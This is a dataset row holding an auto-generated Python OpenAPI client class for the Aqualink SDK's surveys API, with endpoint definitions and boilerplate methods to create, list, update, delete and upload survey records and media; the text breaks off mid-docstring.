hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f0e268808b8a2ef9ee0986dacbbc2d44434e5ee3 | 51,673 | py | Python | sdk/aqualink_sdk/api/surveys_api.py | aqualinkorg/aqualink-sdk | dad972d1dd5b74e8216bdc30521a8b76f7844733 | [
"MIT"
] | 1 | 2022-02-06T23:05:37.000Z | 2022-02-06T23:05:37.000Z | sdk/aqualink_sdk/api/surveys_api.py | aqualinkorg/aqualink-sdk | dad972d1dd5b74e8216bdc30521a8b76f7844733 | [
"MIT"
] | 3 | 2022-02-07T06:13:31.000Z | 2022-03-11T12:43:39.000Z | sdk/aqualink_sdk/api/surveys_api.py | aqualinkorg/aqualink-sdk | dad972d1dd5b74e8216bdc30521a8b76f7844733 | [
"MIT"
] | null | null | null | """
Aqualink API documentation
The Aqualink public API documentation # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from aqualink_sdk.api_client import ApiClient, Endpoint as _Endpoint
from aqualink_sdk.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from aqualink_sdk.model.create_survey_dto import CreateSurveyDto
from aqualink_sdk.model.create_survey_media_dto import CreateSurveyMediaDto
from aqualink_sdk.model.edit_survey_dto import EditSurveyDto
from aqualink_sdk.model.edit_survey_media_dto import EditSurveyMediaDto
from aqualink_sdk.model.inline_response404 import InlineResponse404
from aqualink_sdk.model.survey import Survey
from aqualink_sdk.model.survey_media import SurveyMedia
class SurveysApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.surveys_controller_create_endpoint = _Endpoint(
settings={
'response_type': (Survey,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys',
'operation_id': 'surveys_controller_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'site_id',
'create_survey_dto',
],
'required': [
'site_id',
'create_survey_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'create_survey_dto':
(CreateSurveyDto,),
},
'attribute_map': {
'site_id': 'siteId',
},
'location_map': {
'site_id': 'path',
'create_survey_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.surveys_controller_create_media_endpoint = _Endpoint(
settings={
'response_type': (SurveyMedia,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/{id}/media',
'operation_id': 'surveys_controller_create_media',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
'create_survey_media_dto',
],
'required': [
'site_id',
'id',
'create_survey_media_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
'create_survey_media_dto':
(CreateSurveyMediaDto,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
'create_survey_media_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.surveys_controller_delete_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/{id}',
'operation_id': 'surveys_controller_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
],
'required': [
'site_id',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_delete_media_endpoint = _Endpoint(
settings={
'response_type': None,
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/media/{id}',
'operation_id': 'surveys_controller_delete_media',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
],
'required': [
'site_id',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_find_endpoint = _Endpoint(
settings={
'response_type': ([Survey],),
'auth': [],
'endpoint_path': '/sites/{siteId}/surveys',
'operation_id': 'surveys_controller_find',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'site_id',
],
'required': [
'site_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
},
'location_map': {
'site_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_find_media_endpoint = _Endpoint(
settings={
'response_type': ([SurveyMedia],),
'auth': [],
'endpoint_path': '/sites/{siteId}/surveys/{id}/media',
'operation_id': 'surveys_controller_find_media',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
],
'required': [
'site_id',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_find_one_endpoint = _Endpoint(
settings={
'response_type': (Survey,),
'auth': [],
'endpoint_path': '/sites/{siteId}/surveys/{id}',
'operation_id': 'surveys_controller_find_one',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
],
'required': [
'site_id',
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.surveys_controller_update_endpoint = _Endpoint(
settings={
'response_type': (Survey,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/{id}',
'operation_id': 'surveys_controller_update',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
'edit_survey_dto',
],
'required': [
'site_id',
'id',
'edit_survey_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
'edit_survey_dto':
(EditSurveyDto,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
'edit_survey_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.surveys_controller_update_media_endpoint = _Endpoint(
settings={
'response_type': (SurveyMedia,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/media/{id}',
'operation_id': 'surveys_controller_update_media',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'site_id',
'id',
'edit_survey_media_dto',
],
'required': [
'site_id',
'id',
'edit_survey_media_dto',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'id':
(float,),
'edit_survey_media_dto':
(EditSurveyMediaDto,),
},
'attribute_map': {
'site_id': 'siteId',
'id': 'id',
},
'location_map': {
'site_id': 'path',
'id': 'path',
'edit_survey_media_dto': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.surveys_controller_upload_endpoint = _Endpoint(
settings={
'response_type': (str,),
'auth': [
'bearer'
],
'endpoint_path': '/sites/{siteId}/surveys/upload',
'operation_id': 'surveys_controller_upload',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'site_id',
'file',
],
'required': [
'site_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'site_id':
(float,),
'file':
(file_type,),
},
'attribute_map': {
'site_id': 'siteId',
'file': 'file',
},
'location_map': {
'site_id': 'path',
'file': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'multipart/form-data'
]
},
api_client=api_client
)
def surveys_controller_create(
self,
site_id,
create_survey_dto,
**kwargs
):
"""Creates a new survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_create(site_id, create_survey_dto, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
create_survey_dto (CreateSurveyDto):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Survey
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['create_survey_dto'] = \
create_survey_dto
return self.surveys_controller_create_endpoint.call_with_http_info(**kwargs)
def surveys_controller_create_media(
self,
site_id,
id,
create_survey_media_dto,
**kwargs
):
"""Creates a new survey media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_create_media(site_id, id, create_survey_media_dto, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
create_survey_media_dto (CreateSurveyMediaDto):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
SurveyMedia
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
kwargs['create_survey_media_dto'] = \
create_survey_media_dto
return self.surveys_controller_create_media_endpoint.call_with_http_info(**kwargs)
def surveys_controller_delete(
self,
site_id,
id,
**kwargs
):
"""Deletes a specified survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_delete(site_id, id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
return self.surveys_controller_delete_endpoint.call_with_http_info(**kwargs)
def surveys_controller_delete_media(
self,
site_id,
id,
**kwargs
):
"""Deletes a specified survey media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_delete_media(site_id, id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
return self.surveys_controller_delete_media_endpoint.call_with_http_info(**kwargs)
def surveys_controller_find(
self,
site_id,
**kwargs
):
"""Returns all site's survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_find(site_id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Survey]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
return self.surveys_controller_find_endpoint.call_with_http_info(**kwargs)
def surveys_controller_find_media(
self,
site_id,
id,
**kwargs
):
"""Returns all media of a specified survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_find_media(site_id, id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[SurveyMedia]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
return self.surveys_controller_find_media_endpoint.call_with_http_info(**kwargs)
def surveys_controller_find_one(
self,
site_id,
id,
**kwargs
):
"""Returns specified survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_find_one(site_id, id, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Survey
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
return self.surveys_controller_find_one_endpoint.call_with_http_info(**kwargs)
def surveys_controller_update(
self,
site_id,
id,
edit_survey_dto,
**kwargs
):
"""Updates a specified survey # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_update(site_id, id, edit_survey_dto, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
edit_survey_dto (EditSurveyDto):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Survey
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['site_id'] = \
site_id
kwargs['id'] = \
id
kwargs['edit_survey_dto'] = \
edit_survey_dto
return self.surveys_controller_update_endpoint.call_with_http_info(**kwargs)
def surveys_controller_update_media(
self,
site_id,
id,
edit_survey_media_dto,
**kwargs
):
"""Updates a specified survey media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.surveys_controller_update_media(site_id, id, edit_survey_media_dto, async_req=True)
>>> result = thread.get()
Args:
site_id (float):
id (float):
edit_survey_media_dto (EditSurveyMediaDto):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
